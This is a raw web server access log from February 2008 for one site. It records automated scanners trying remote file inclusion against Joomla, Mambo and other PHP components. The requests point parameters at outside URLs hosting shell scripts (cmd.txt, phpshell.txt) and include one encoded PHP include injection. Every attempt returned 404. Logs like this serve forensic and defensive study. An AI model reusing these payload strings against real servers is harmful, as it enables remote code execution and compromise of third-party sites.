87.106.69.226 - - [14/Feb/2008:09:14:32 -0800] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:14:33 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:14:33 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:14:39 -0800] "GET /logs/access_080122.log//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.194.121 - - [14/Feb/2008:09:15:15 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:09:15:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:09:15:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:15:33 -0800] "GET /logs/access_080123.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:15:33 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:15:33 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:09:15:54 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:09:15:54 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:09:15:54 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:31 -0800] "GET /logs/access_080123.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:31 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:32 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:16:37 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:54 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:54 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:16:54 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:17:04 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:17:04 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:17:04 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:09:17:11 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:17:25 -0800] "GET /logs/access_080131.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:17:35 -0800] "GET /logs/access_080131.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:17:40 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:17:41 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:17:41 -0800] "GET /logs/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:17:48 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:17:48 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:17:49 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:02 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:02 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:02 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.186.33.28 - - [14/Feb/2008:09:18:07 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:18:35 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:38 -0800] "GET /logs/access_080131.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:18:40 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:18:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:18:41 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:44 -0800] "GET /logs/access_080123.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:45 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:18:45 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.30 - - [14/Feb/2008:09:18:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "genieBot (genieBot@genieknows.com)" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:18:47 -0800] "GET /logs/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:18:48 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:19:22 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:19:22 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:20:34 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:20:34 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:20:35 -0800] "GET /logs/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [14/Feb/2008:09:20:40 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [14/Feb/2008:09:20:40 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.152.104 - - [14/Feb/2008:09:20:45 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [14/Feb/2008:09:21:47 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [14/Feb/2008:09:21:47 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [14/Feb/2008:09:21:48 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.203 - - [14/Feb/2008:09:22:09 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.203 - - [14/Feb/2008:09:22:09 -0800] "GET /imperant/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:22 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:22 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:22 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:22 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:23 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:22:23 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:23:00 -0800] "GET /logs/access_080131.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:09:23:05 -0800] "GET /logs/access_080131.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:23:14 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:09:23:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [14/Feb/2008:09:24:01 -0800] "GET /modules/class/db/db_double.php?sys_conf[path][real]=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:24:08 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:24:08 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:24:09 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:09:24:16 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.173.254.28 - - [14/Feb/2008:09:24:20 -0800] "GET /logs/access_080130.log///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.254.28 - - [14/Feb/2008:09:24:20 -0800] "GET ///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.173.254.28 - - [14/Feb/2008:09:24:20 -0800] "GET /logs///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:25:29 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:25:32 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:25:32 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:26:36 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:09:26:38 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:09:26:39 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:09:26:39 -0800] "GET /logs/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:09:28:37 -0800] "GET /logs/access_071219.log/http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:09:28:38 -0800] "GET /http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:09:28:38 -0800] "GET /logs/http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:09:29:08 -0800] "GET /logs/access_071212.log/http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.213.21 - - [14/Feb/2008:09:29:24 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.21 - - [14/Feb/2008:09:29:24 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://ineal.biz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:29:37 -0800] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:29:38 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:30:03 -0800] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:09:30:55 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:31:48 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:31:51 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:31:51 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:31:52 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.186.33.28 - - [14/Feb/2008:09:32:33 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.186.33.28 - - [14/Feb/2008:09:32:33 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [14/Feb/2008:09:33:47 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:34:19 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
